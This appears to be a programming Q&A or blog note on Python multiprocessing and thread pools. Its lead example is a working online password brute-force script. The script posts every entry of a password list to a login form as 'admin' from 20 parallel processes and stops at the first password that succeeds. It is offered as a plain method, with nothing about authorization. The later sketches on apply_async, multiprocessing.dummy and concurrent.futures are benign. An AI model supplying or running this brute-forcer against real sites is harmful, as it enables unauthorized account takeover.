Question: How can data be fetched with multiple processes?
Method:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Pool

import requests

host = 'http://xxx.com/'


def topass(passwd):
    """Try one password; return (passwd, True) if the login succeeded."""
    print(passwd)
    data = {
        'Username': 'admin',
        'Password': passwd,
        'submit': 'Login'
    }
    r = requests.post(host, data=data)
    # str.find returns -1 when the text is absent; str.index would raise ValueError.
    err_idx = r.text.find('Password authentication failure')
    return passwd, err_idx < 0


if __name__ == '__main__':
    # Open the file only in the parent process and strip the trailing newlines.
    with open('pass_list.txt', 'r', encoding='UTF-8', errors='ignore') as fin:
        passwords = [line.strip() for line in fin if line.strip()]
    # Leaving the with block terminates the pool, so the remaining tasks are dropped.
    with Pool(20) as p:
        # exit() inside a worker would not stop the pool, so results are checked here.
        for passwd, ok in p.imap_unordered(topass, passwords):
            if ok:
                print('Success: The password is %s' % passwd)
                break
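
A worker submitted with apply_async cannot stop the whole pool by calling exit(), so one option is to return a value from the worker and read it in the parent through the AsyncResult object. The following is a minimal sketch of that idea with no network access. The names check and first_match, the fixed target 'c', and the sample list are hypothetical and used only for illustration.

```python
from multiprocessing import Pool


def check(candidate):
    # Hypothetical stand-in for the network request:
    # report whether the candidate equals a fixed target string.
    return candidate, candidate == 'c'


def first_match(candidates, workers=4):
    # Submit every candidate, then read the results in submission order.
    with Pool(workers) as pool:
        pending = [pool.apply_async(check, args=(c,)) for c in candidates]
        for res in pending:
            candidate, ok = res.get(timeout=30)
            if ok:
                # Returning leaves the with block, which terminates the pool.
                return candidate
    return None


if __name__ == '__main__':
    print(first_match(['a', 'b', 'c', 'd']))
```

Because the decision is made in the parent process, the pool can be shut down cleanly as soon as a match is found.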
Further reading:
https://zhuanlan.zhihu.com/p/111269552 Python multithreading: from multiprocessing.dummy import Pool as ThreadPool
https://blog.csdn.net/a_jie_2016_05/article/details/89668723 import threading
https://www.cnblogs.com/fan-yi/p/14003998.html concurrent.futures
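
For I/O-bound work such as HTTP requests, the thread-based tools named in the links above are often sufficient. The sketch below runs the same task through multiprocessing.dummy and through concurrent.futures. The function work is a hypothetical stand-in for a request, and the helper names with_thread_pool and with_executor are illustrative only.

```python
from concurrent.futures import ThreadPoolExecutor, as_completed
from multiprocessing.dummy import Pool as ThreadPool


def work(n):
    # Hypothetical stand-in for an I/O-bound request.
    return n * n


def with_thread_pool(items, workers=4):
    # multiprocessing.dummy offers the Pool API backed by threads;
    # map returns the results in input order.
    with ThreadPool(workers) as pool:
        return pool.map(work, items)


def with_executor(items, workers=4):
    # as_completed yields futures as they finish, so the results are sorted
    # here to make the output independent of completion order.
    with ThreadPoolExecutor(max_workers=workers) as executor:
        futures = [executor.submit(work, n) for n in items]
        return sorted(f.result() for f in as_completed(futures))


if __name__ == '__main__':
    print(with_thread_pool([1, 2, 3]))
    print(with_executor([1, 2, 3]))
```

Threads share memory and start faster than processes, while a process pool is the better fit when the work is CPU-bound.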